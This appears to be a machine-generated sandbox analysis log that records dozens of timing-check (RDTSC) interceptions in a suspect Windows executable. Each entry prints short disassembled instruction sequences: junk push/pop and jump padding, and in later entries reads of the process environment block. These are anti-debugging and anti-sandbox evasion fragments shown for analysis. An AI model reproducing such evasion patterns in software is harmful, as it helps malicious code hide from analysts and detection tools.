Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D02A second address: 166D059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9CD8F21AF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F9CD8F21B13h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D059 second address: 166D05E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D1AF second address: 166D1B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D1B5 second address: 166D1C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65990h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D328 second address: 166D32E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D32E second address: 166D332 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D332 second address: 166D34C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9CD8F21AFEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D34C second address: 166D35C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9CD8E65986h 0x00000008 jo 00007F9CD8E65986h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D35C second address: 166D363 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D363 second address: 166D369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D369 second address: 166D385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9CD8F21AFFh 0x00000009 popad 0x0000000a jnp 00007F9CD8F21AFEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D4DC second address: 166D4F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8E65990h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D4F0 second address: 166D507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9CD8F21AFEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D507 second address: 166D529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9CD8E6598Dh 0x0000000e jns 00007F9CD8E6598Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D529 second address: 166D54C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8F21B09h 0x00000009 jnp 00007F9CD8F21AF6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1675ACF second address: 1675AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9CD8E65986h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1675AD9 second address: 1675AE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F9CD8F21AF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1675AE8 second address: 1675AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 168325D second address: 1683294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jp 00007F9CD8F21AFCh 0x00000010 jnc 00007F9CD8F21AFEh 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007F9CD8F21AF6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 168575B second address: 1685761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1685761 second address: 1685767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1688076 second address: 168808D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007F9CD8E65986h 0x0000000c jmp 00007F9CD8E6598Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 168808D second address: 16880A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jns 00007F9CD8F21AF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d jnc 00007F9CD8F21B3Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16880A4 second address: 16880BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9CD8E65995h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16880BD second address: 16880C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 168CF7E second address: 168CF88 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9CD8E6598Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 168CF88 second address: 168CF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 168CF8F second address: 168CFC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jmp 00007F9CD8E65998h 0x00000015 jmp 00007F9CD8E6598Eh 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1699356 second address: 1699360 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9CD8F21AF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1699360 second address: 169937B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9CD8E65992h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 169937B second address: 1699380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1699380 second address: 16993AD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9CD8E65999h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F9CD8E65992h 0x00000012 jc 00007F9CD8E65986h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16993AD second address: 16993B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 169C41C second address: 169C42C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F9CD8E65986h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A265E second address: 16A2662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A2912 second address: 16A2931 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9CD8E65988h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9CD8E65991h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A2931 second address: 16A294C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9CD8F21AF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007F9CD8F21B02h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push esi 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A2A8C second address: 16A2A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A2D68 second address: 16A2D6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A2D6C second address: 16A2D70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A2D70 second address: 16A2D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A2D76 second address: 16A2D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9CD8E65992h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A2D90 second address: 16A2D94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A3742 second address: 16A3746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A3746 second address: 16A3761 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9CD8F21AF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 pushad 0x00000012 ja 00007F9CD8F21AF6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A3761 second address: 16A377F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9CD8E65992h 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F9CD8E65986h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A377F second address: 16A3783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A3783 second address: 16A3787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A611F second address: 16A6134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F9CD8F21AF6h 0x0000000c popad 0x0000000d pop edi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A6134 second address: 16A6138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A6138 second address: 16A614E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B02h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A6284 second address: 16A62B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F9CD8E65991h 0x0000000d jmp 00007F9CD8E6598Dh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 pop edx 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A62B7 second address: 16A62BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16F7259 second address: 16F7263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16F7263 second address: 16F7267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BBB81 second address: 17BBBA8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9CD8E6598Ch 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F9CD8E6598Ah 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAD0D second address: 17BAD15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAD15 second address: 17BAD21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAD21 second address: 17BAD25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAD25 second address: 17BAD33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F9CD8E6598Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAFFB second address: 17BAFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAFFF second address: 17BB018 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9CD8E6598Bh 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BB018 second address: 17BB02C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F9CD8F21AFFh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BB449 second address: 17BB44D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BB44D second address: 17BB451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BB451 second address: 17BB457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BB6F1 second address: 17BB707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9CD8F21AFEh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BB707 second address: 17BB710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BB710 second address: 17BB714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BB714 second address: 17BB71A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BB884 second address: 17BB8A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21AFEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9CD8F21AFFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BE4F6 second address: 17BE4FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BE706 second address: 17BE70D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BE70D second address: 17BE712 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BE7FC second address: 17BE801 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BE801 second address: 17BE80F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BE80F second address: 17BE82E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9CD8F21B03h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BE82E second address: 17BE84F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65995h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BE84F second address: 17BE855 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BE855 second address: 17BE86E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9CD8E6598Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BFDB6 second address: 17BFDBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E001C second address: 73E004F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9CD8E6598Dh 0x00000009 add esi, 2DFD6F16h 0x0000000f jmp 00007F9CD8E65991h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E004F second address: 73E0053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0053 second address: 73E0059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0059 second address: 73E0080 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9CD8F21AFEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0080 second address: 73E00C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E6598Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9CD8E6598Bh 0x00000013 or eax, 0A8FC65Eh 0x00000019 jmp 00007F9CD8E65999h 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E00C1 second address: 73E00C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E00C6 second address: 73E010D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65997h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F9CD8E65996h 0x00000010 mov eax, dword ptr fs:[00000030h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F9CD8E6598Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E010D second address: 73E0113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0113 second address: 73E01BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9CD8E6598Ch 0x00000009 xor cx, 9F18h 0x0000000e jmp 00007F9CD8E6598Bh 0x00000013 popfd 0x00000014 call 00007F9CD8E65998h 0x00000019 pop eax 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d sub esp, 18h 0x00000020 jmp 00007F9CD8E65991h 0x00000025 xchg eax, ebx 0x00000026 pushad 0x00000027 movzx ecx, di 0x0000002a popad 0x0000002b push eax 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F9CD8E6598Eh 0x00000033 and al, 00000008h 0x00000036 jmp 00007F9CD8E6598Bh 0x0000003b popfd 0x0000003c popad 0x0000003d xchg eax, ebx 0x0000003e jmp 00007F9CD8E65996h 0x00000043 mov ebx, dword ptr [eax+10h] 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F9CD8E65997h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E01BE second address: 73E023F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F9CD8F21AFEh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F9CD8F21B07h 0x00000018 add ax, 4B6Eh 0x0000001d jmp 00007F9CD8F21B09h 0x00000022 popfd 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 mov esi, 218ADDCDh 0x0000002b popad 0x0000002c xchg eax, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F9CD8F21AFFh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E023F second address: 73E02AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65999h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [74E806ECh] 0x0000000f jmp 00007F9CD8E6598Eh 0x00000014 test esi, esi 0x00000016 pushad 0x00000017 mov ax, 9F8Dh 0x0000001b pushfd 0x0000001c jmp 00007F9CD8E6598Ah 0x00000021 adc cl, FFFFFFA8h 0x00000024 jmp 00007F9CD8E6598Bh 0x00000029 popfd 0x0000002a popad 0x0000002b jne 00007F9CD8E6679Ch 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F9CD8E65995h 0x00000038 rdtsc
